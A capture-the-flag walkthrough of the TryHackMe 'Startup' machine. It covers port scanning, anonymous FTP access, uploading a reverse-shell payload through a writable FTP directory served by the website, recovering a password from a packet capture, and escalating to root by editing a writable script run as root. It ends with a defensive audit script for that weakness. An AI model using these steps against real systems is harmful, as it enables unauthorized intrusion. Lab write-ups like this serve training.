Starter
Lab Setup
mkdir ~/Documents/TryHackMe/Startup
cd ~/Documents/TryHackMe/Startup
mkdir recon enumeration notes
touch notes/{creds,vulns,README.md}
export IP=10.10.170.30
export URL=http://$IP
Enumeration
First, I scan the machine for open ports using nmap and rustscan. The second is faster than the first, and I do a simple scan.
nmap
nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp
rustscan
rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init
Looks like we have 3 open ports:
21 (FTP)
22 (SSH)
80 (HTTP)
Starting with the FTP port, it looks like we can log in with default credentials -> anonymous:anonymous
On the FTP server I found 3 files: 1 jpg, 2 text. Remember: always add the -a flag to the ls command; you can find some hidden files.

These files do not give us any important information.
HTTP port
I try to enumerate the website, but I get just the /files directory, and this seems to be the same as what we get on the FTP server. Also, nikto doesn't find anything more.

You can change the wordlist and add some extensions if you want
Exploitation
The /ftp directory on the FTP server seems to have full permissions, so I upload a payload to this directory to get a reverse shell. Access the file from the website and get a reverse shell. Don’t forget to establish a reverse shell.

In / you will find the recipe.txt file, where you can get the answer for the first question. Also in this directory you will find another directory owned by www-data.
I found a pcapng file. Let’s download it and analyze it.
In the pcapng file we use Follow TCP Stream and get the password for the user lennie.

Privilege Escalation
In lennie's home directory I found the user flag and another important file. It looks like the planner.sh file executes another file, print.sh, as root. We have full permissions on print.sh, so let’s put a payload in it, open another reverse shell and get root privileges.
After waiting a few minutes, I get the root shell.
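The escalation above works because a script run as root calls a helper that a lower-privileged account can edit. A hardening check for that condition, as an added example that is not part of the original write-up; the function names, the default trusted owner `root` and the fixture in `demo` are assumptions:

```shell
#!/bin/sh
# Added example: report files that a privileged script depends on and that an
# untrusted account could modify. Not from the original write-up.

# audit_path PATH OWNER: print PATH if it is not owned by OWNER or is
# group/world-writable. -prune keeps find from descending into directories.
audit_path() {
    find -H "$1" -prune \( ! -user "$2" -o -perm -020 -o -perm -002 \) -print 2>/dev/null
}

# audit_script SCRIPT [OWNER]: check the script itself, every regular file it
# names by absolute path on a non-comment line, and each file's parent
# directory (a writable directory lets the file be replaced).
audit_script() {
    script=$1
    owner=${2:-root}
    {
        audit_path "$script" "$owner"
        grep -v '^[[:space:]]*#' "$script" |
            grep -oE '/[A-Za-z0-9_./-]+' |
            while read -r p; do
                [ -f "$p" ] || continue
                audit_path "$p" "$owner"
                audit_path "$(dirname "$p")" "$owner"
            done
    } | sort -u
}

# Constructed fixture: a scheduled script calling one loosely-permissioned
# helper and one locked-down helper. File names mirror the write-up; the
# contents are made up. The current user stands in for the trusted owner.
demo() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho done\n' > "$d/print.sh"
    printf '#!/bin/sh\necho ok\n' > "$d/safe.sh"
    printf '#!/bin/sh\n%s/print.sh\n%s/safe.sh\n' "$d" "$d" > "$d/planner.sh"
    chmod 755 "$d/planner.sh" "$d/safe.sh"
    chmod 777 "$d/print.sh"
    audit_script "$d/planner.sh" "$(id -u)" | sed "s|^$d/||"
    rm -rf "$d"
}
```

On a real host, run `audit_script` against each script started by root's cron jobs or services; any path it prints should be re-owned to root and stripped of group/world write permission.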
